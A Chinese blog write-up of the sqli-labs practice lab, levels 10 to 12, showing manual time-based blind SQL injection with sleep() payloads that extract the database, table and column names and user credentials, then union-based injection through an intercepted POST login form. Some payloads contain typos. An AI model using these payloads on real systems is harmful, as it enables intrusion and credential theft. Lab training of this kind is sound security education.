程序员经验分享-hwhale

sqli-labs-master sql注入靶场(10、11、12)

2023-10-31

sqli-labs-master sql注入靶场(10-12)
pass-10
在这里插入图片描述
首先,这题用sqlmap跑不出来
在这里插入图片描述
sqlmap提示我们这题是时间盲注
无论我们输入什么,不管对错页面都是You are in…
我们用sleep函数来判断对错
如果我们写了sleep(3)
那么如果页面报错就是立刻回显You are in…
如果页面没有报错就是三秒后回显You are in…
if(1=1,1,sleep(3)) 意思就是,1=1页面没报错的时候立刻回显You are in… 页面报错了就三面后回显

开始做题
?id=1" and if(1=1,1,sleep(3))-- -
立刻回显,说明页面没报错
在这里插入图片描述
?id=1" and if(1=2,1,sleep(3))-- -
圈出来的地方转了三秒,也就是三秒后回显,即页面报错
也就是1=1没报错,1=2报错,双引号就是闭合字符
在这里插入图片描述
爆数据库字符长度
?id=1" and if(length(database())=9,1,sleep(3))-- -
三秒后回显Youarein… 说明页面报错
在这里插入图片描述
?id=1" and if(length(database())=8,1,sleep(3))-- -
立刻回显,说明页面没报错,也就是说,数据库字符长度为8
在这里插入图片描述
爆数据库
爆数据库第一个字母
?id=1" and if(left(database(),1)>‘s’,1,sleep(3))-- -
三面后回显,说明报错,说明第一个字母大于s是错的

?id=1" and if(left(database(),1)>‘r’,1,sleep(3))-- -
立即回显,说明没报错,说明第一个字母大于r是对的
也就是说第一个字母是s

爆第二个字母
?id=1" and if(database(),2)>‘se’,1,sleep(3))-- -
三秒后回显,说明报错

?id=1" and if(database(),2)>‘sd’,1,sleep(3))-- -
立即回显,说明没报错
第二个字母为e

爆第三个字母
?id=1" and if(left(database(),3)>‘sec’,1,sleep(3))-- -
三秒后回显,说明报错
?id=1" and if(left(database(),3)>‘seb’,1,sleep(3))-- -
立即回显,说明没有报错
同理,一直到爆出security为止

爆表
?id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))>100,1,sleep(3))-- -
立刻回显说明没有报错

?id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))>101,1,sleep(3))-- -
三秒后回显,说明报错
即第一张表第一个字符的ascii码为101
后面字符分别为109 97 105 108 115
试到第一张表,第七个字符的时候,试什么都三秒后回显,说明试什么都报错,也就是说第一张表一共六个字符,分别是101e 109m 97a 105i 108l 115s
即第一张表名为emails
在这里插入图片描述
第二个表第一个字符ascii码为114
后面分别为101 102 101 114 101 114 115
试到第九个字符的时候不管大于多少都三秒后回显,说明报错,说明第二张表只有八个字符

?id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>114,1,sleep(3))-- -

在这里插入图片描述
写一个简单的python脚本,将ascii码转化为字符

def  shuchu():
	a=[114,101,102,101,114,101,114,115]
	i=0
	while(i<len(a)):
		print(chr(a[i]))
		i=i+1
shuchu()

在这里插入图片描述
第二张表为referers
第三张表ascii分别为117,97,103,101,110,116,115,

?id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 2,1),1,1))>117,1,sleep(3))-- -

在这里插入图片描述
将ascii码放到脚本跑一下,第三张表为uagents
在这里插入图片描述
第四张表分别为117,115,101,114,115
脚本跑一下

def  shuchu():
	a=[117,115,101,114,115]
	i=0
	while(i<len(a)):
		print(chr(a[i]))
		i=i+1
shuchu()

在这里插入图片描述
第四张表users

爆列

?id=1" and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users" and table_schema=database() limit 0,1),19,1))>114,1,sleep(3))-- -

105,100,44,117,115,101,114,110,97,109,101,44,112,97,115,115,119,111,114,100
放脚本跑一下

def  shuchu():
	a=[105,100,44,117,115,101,114,110,97,109,101,44,112,97,115,115,119,111,114,100]
	i=0
	while(i<len(a)):
		print(chr(a[i]))
		i=i+1
shuchu()

在这里插入图片描述
爆字段

?id=1" and if(ascii(substr((select group_concat(id,username,password) from users  limit 0,1),9,1))>98,1,sleep(3))-- -

49,68,117,109,98,68,117,109,98
在这里插入图片描述
1 Dumb Dumb
等等

pass-11
抓一下登录包,这里是post传参,在url里面注入已经没用了,我们在burpsuite里面改包

uname=admin' and 1=1-- -1=1时候没报错,1=2报错,所以闭合字符为'

在这里插入图片描述

在这里插入图片描述
order by 1,2,3 报错
order by 1,2不报错
在这里插入图片描述

看回显点
uname=admin' and 1=2 union select 1,2-- -

爆库
uname=admin' and 1=2 union select 1,database()-- -

在这里插入图片描述
库名为security

爆表
uname=admin' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()-- -

表名为
emails,referers,uagents,users

在这里插入图片描述

爆列
uname=admin' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name="users" and  table_schema=database()-- -

列名为
id,username,password

在这里插入图片描述

爆字段
uname=admin' and 1=2 union select 1,group_concat(id,username,password) from users-- -

在这里插入图片描述
pass-12
通过测试’ " ') “)后
闭合字符是”)
后面操作跟11题一样

最后补充一点,pass-10用sqlmap爆不出来,我这篇文章是手注的,可以看我后面一篇文章 python脚本实现sql时间盲注 这里面写的很详细

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

SQL注入

ctf练习记录

sql

web安全

安全

sqli-labs-master sql注入靶场(10、11、12) 的相关文章

随机推荐

  • c语言中stat函数,C语言:stat,fstat和lstat函数

    这三个函数的功能是一致的 都用于获取文件相关信息 但应用于不同的文件对象 对于函数中给出pathname参数 stat函数返回与此命名文件有关的信息结构 fstat函数获取已在描述符fields上打开文件的有关信息 lstat函数类似于st

  • Seata导致本地事务@Transactional失效解决方案

    原理 把spirng本地事务数据源设置为seata代理数据源 核心代码 在seata配置类中加入 Bean txManager public DataSourceTransactionManager txManager DataSource

  • JAVA中自定义异常方法抛出异常

    开发工具与关键技术 JAVA中的自定义异常 作者 邓崇富 撰写时间 2019 年 4 月 26 日 一 通过throw抛出异常 使用java内置的异常类可以描述在编程时出现的大部分异常情况 除此之外 用户只需要集成Exception类即可自

  • Docker开启远程进程服务以及VSCode、Idea等IDE连接使用远程

    Docker开启远程进程服务以及VSCode Idea等IDE连接使用远程 Docker远程服务 开发环境大多使用的的是windows系统 服务器运行环境一般采用Linux系统 这时候生成镜像时用到远程连接Docker服务 一 开启Dock

  • win10 nvprof的性能分析表

    交叉访问是全局内存中最糟糕的访问模式 因为它浪费总线带宽 使用多个线程块对基于交叉的全局内存访问重新排序到合并访问 https mp weixin qq com s h2XKth1bTujnrxyXTJ2fwg lt lt

  • Spring Boot 学习研究笔记(二十)-docker部署SpringBoot使用nginx配置域名

    Docker发布项目使用Nginx配置域名 步骤如下 第一步 在Docker 中部署SpringBoot JAR 包 详情请查看 Spring Boot 学习研究笔记 十二 Dcoker 中部署SpringBoot jar包 第二步 配置域

  • metric_logger小解

    今天看见这个一个函数metric logger 通过搜索资料发现他是utils中的一个MetricLogger类 可称它为度量记录器 因为这种都是自定义的 那我只说说我遇见的这个趴 我们先来看看他初始化里有什么 def init self

  • VMware14安装虚拟机出错——Intel VT-x处于禁用状态

    解决方法 进入BIOS 模式中 开启Intel VT x 具体步骤 win10 1 打开设置 搜索 高级启动 选择更改高级启动选项设置 然后点击立即启动 2 启动后 在蓝屏界面中选择疑难解答 gt 高级选项 gt UEFI固件设置 gt 选

  • 【matlab图像处理】插值方法

    中国史之 懿王攻犬戎 周懿 yi 王攻打犬戎的战争 周懿王在位时期 西周衰弱 戎族不断入侵周朝 一度打到镐 今陕西西安 岐 今陕西岐县 等地 懿王被迫迁都槐里 今陕西兴平县 周懿王派虢 guo 公率军北伐犬戎 企图收复失地 但不幸战败 来源

  • 抽象类、模板方法

    抽象类理解为一种模板 模板模式 使用 package com example demo author dc version 1 0 date 2023 03 28 12 55 public abstract class DayPlan pu

  • PMOS开关管的选择与电路图

    中心议题 探讨 解决方案 选用N沟道还是P沟道 确定额定电流 确定热要求 首先要进行MOSFET的选择 MOSFET有两大类型 N沟道和P沟道 在功率系统中 MOSFET可被看成电气开关 当在N沟道MOSFET的栅极和源极间加上正电压时 其

  • centos7 配置网络_linux入门系列11--Centos7网络服务管理

    通过前面文章的学习已经掌握了Linux系统配置管理的知识 本文讲解Centos7网络配置知识 Linux要对外提供服务 需要保证网络通信正常 因此需要正确配置网络参数 本文将讲解如何使用Network Manager配置网络参数 管理网络会

  • MATLAB中复数矩阵的转置、共轭及共轭转置

    参考博客 https blog csdn net zhaozhichenghpu article details 79162287 MATLAB中生成一个复数矩阵 MATLAB中复数矩阵的共轭用conj A MATLAB中复数矩阵的转置 A

  • 安卓USB模块源码分析(一)- 准备

    介绍USB服务在Android服务体系中的位置 源码的位置及使用AndroidStudio 查看USB模块FWK的配置方式 Windows环境准备 WSL2安装及AOSP源码下载编译 shimo im 安卓服务概览 Android 主要有如

  • os.walk()的使用方法

    os walk 主要用来扫描某个指定目录下所包含的子目录和文件 这篇文章将通过几个简单的例子来说明python中os walk 的使用方法 一 从上到下 遍历目录 该文件夹 和子目录 子文件夹 以及文件 txt等 假设我们的test文件夹有

  • 如何在JavaScript中实现继承?

    聚沙成塔 每天进步一点点 专栏简介 原型链继承 借用构造函数继承 构造函数继承 组合继承 原型式继承 寄生式继承 寄生组合式继承 写在最后 专栏简介 前端入门之旅 探索Web开发的奇妙世界 记得点击上方或者右侧链接订阅本专栏哦 几何带你启航

  • 内核模式代码签名走查(四)

    如何禁用测试计算机上的强制签名 在驱动程序开发的早期阶段 开发人员签署每个构建都可能很麻烦 因为这个原因 WindowsVista提供了几个方式来临时禁用内核模式代码签名实施 以便测试计算机可以安装和加载未签名的驱动程序 附加一个内核调试器

  • Java语言程序设计(一)选择题

    1 1 如下哪个是 Java中的标识符 A public B super C 3number D width 2 如下哪个是 Java中的标识符 A fieldname B super C 3number D number 3 已知如下定义

  • Linux IO协议栈框图

    Linux IO协议栈框图 来源 http www thomas krenn com en oss linux io stack diagram linux io stack diagram v0 1 pdf

  • sqli-labs-master sql注入靶场(10、11、12)

    sqli labs master sql注入靶场 10 12 pass 10 首先 这题用sqlmap跑不出来 sqlmap提示我们这题是时间盲注 无论我们输入什么 不管对错页面都是You are in 我们用sleep函数来判断对错 如果

热门标签